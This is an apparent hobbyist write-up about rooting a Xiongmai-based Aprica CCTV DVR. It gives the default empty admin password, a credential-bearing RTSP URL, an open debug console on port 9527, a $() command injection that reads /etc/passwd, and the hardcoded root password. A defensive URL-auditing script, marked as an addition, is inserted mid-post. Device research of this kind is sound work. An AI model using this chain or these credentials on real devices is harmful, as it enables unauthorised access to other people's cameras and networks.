Notes on Hacking an Aprica 8 Channel CCTV

Quick initial notes on hacking the “Aprica” CCTV 8 Channel DVR as sold in kit form on Takealot in South Africa. (It was on special at one point for R 2650 but is no longer sold.)

The device appears to be based on a Hangzhou Xiongmai Technology (http://www.xiongmaitech.com/) DVR board. I’ve not found the exact model board yet; the closest one I’ve found is http://www.xiongmaitech.com/en/index.php/product/product-detail/148/96/122, however mine only has a single SATA port.

Firmware

At the time of writing this I had not yet found a firmware image for the device. If anyone knows where I can find one (ideally with the Aprica branding), please let me know.

Software

The CMS and DeviceManager software from Xiongmaitech do work with the DVR device and allow for better remote control and configuration.

Username & Password

The username for the web interface is admin with an empty default password. You can use these same details in the CMS software, in DeviceManager and on the device itself.

Web Interface

The web interface (accessible via the standard HTTP port) uses an ActiveX control to display the live video streams from the cameras. You can manually open the underlying streams in a media player (like VLC or mplayer) by connecting to the following URL:

rtsp://192.168.1.35:554/user=admin&password=&channel=1&stream=0.sdp?real_stream--rtp-caching=100

Replace 192.168.1.35 with the IP of the DVR. The channel is the camera number, and stream is 0 for the high-resolution feed or 1 for the lower-resolution one.
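
An added example, not part of the original post: a small parser for the stream URL layout shown above, useful for auditing saved playlists or player configs, which reports the credential exposure and returns a copy that is safe to log. The function name audit_rtsp_url and the finding texts are assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit

# Path layout of the DVR stream URL as shown on this page:
#   /user=<u>&password=<p>&channel=<n>&stream=<0|1>.sdp
_PATH = re.compile(
    r"^/user=(?P<user>[^&]*)&password=(?P<password>[^&]*)"
    r"&channel=(?P<channel>\d+)&stream=(?P<stream>\d+)\.sdp$"
)

def audit_rtsp_url(url):
    """Parse a DVR stream URL; return (fields, findings, log-safe URL)."""
    parts = urlsplit(url)
    if parts.scheme != "rtsp":
        raise ValueError("not an rtsp:// URL")
    m = _PATH.match(parts.path)
    if m is None:
        raise ValueError("path is not user=/password=/channel=/stream=.sdp")
    info = {
        "host": parts.hostname,
        "port": parts.port or 554,   # 554 is the RTSP port from the scan
        "user": m["user"],
        "channel": int(m["channel"]),
        "stream": int(m["stream"]),
    }
    # rtsp:// is unencrypted, so the whole request line is visible on the wire.
    findings = ["credentials are carried in the URL path in cleartext"]
    if m["password"] == "":
        findings.append("empty password")
    if m["user"] == "admin":
        findings.append("default 'admin' account in use")
    if info["stream"] not in (0, 1):
        findings.append("stream is neither 0 (high-res) nor 1 (low-res)")
    # Mask the password value so the URL can go into logs or tickets.
    redacted = url.replace(
        f"&password={m['password']}&", "&password=<redacted>&", 1)
    return info, findings, redacted

if __name__ == "__main__":
    # URL from the page; 192.168.1.35 is the post's example address.
    sample = ("rtsp://192.168.1.35:554/user=admin&password=&channel=1"
              "&stream=0.sdp?real_stream--rtp-caching=100")
    info, findings, redacted = audit_rtsp_url(sample)
    print(redacted)
    for finding in findings:
        print(" -", finding)
```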

Getting shell access

I want access to the Linux shell on the device so that I can do some more digging around on the device. A quick nmap scan of the machine shows the following ports open.

23/tcp open telnet
80/tcp open http
554/tcp open rtsp
9527/tcp open unknown
34567/tcp open unknown

34567 is used by the control software (CMS or DeviceManager) to control the device via the network.
23 opens a telnet port that prompts for a username and password.

9527 is interesting: if you telnet to this port and hit enter you’ll get a username: prompt. You can use your standard admin login at this prompt and you’ll be greeted by an admin$ prompt. Typing help at this prompt gets the following interesting list of commands.

----------------------Console Commands---------------------------- 
 232 Comm dump 
 485Pro 485 Protocol! 
 Encoder Encoder info! 
 ability Net Ability Utility! 
 ad AD debug interface! 
 alarm Alarm status! 
 autoshut auto shut the DVR 
 
 autotest AutoTest Command! 
 
 bitrate Dump BitRate infomation! 
 bps bps commands! 
 cfg Config Help Utility! 
 comm Comm Input String 
 decoder decorder operation command! 
 encode Encode commands! 
 front front board utility! 
 
 fs Fs debug interface! 
 heap Dump heap status! 
 help Try help! 
 hvr NetDecorderManager Dump! 
 localPlay local play console! 
 log Log utility! 
 netitf NetInterFace Dump! 
 netm NetManager Dump! 
 packet Packet usage! 
 ptz ptz dump! 
 quit Quit! 
 reboot Reboot the system! 
 record Record console utility! 
 resource CPU usage! 
 rtp RTP Dump! 
 screen snapshot current screen! 
 
 shell Linux shell prompt! 
 shutdown Shutdown the system! 
 thread Dump application threads! 
 time Set SystemTime! 
 timer Dump application timers! 
 upgrade Upgrade utility! 
 user Account Information! 
 ver version info! 
To see details, please use 'cmd -h'

The most interesting is the ‘shell’ command; this appears to give you a broken Linux shell of some kind. Normal Linux commands don’t appear to work properly, but echo $PATH shows you the path, so it’s half working?

Through some trial and error I was able to figure out a way to execute some commands. In the end I managed to cat the /etc/passwd file by wrapping the command in $():

$(cat /etc/passwd)
: not foundsxcfbgXtb3o:0:0:root:/:/bin/sh

You’ll see that part of the /etc/passwd file above is obstructed by “: not found”; however, this was enough to get the hash for the password for root.

A quick Google search for the hash absxcfbgXtb3o and I found the root password: xc3511.

Now I can log in to the device via telnet as root.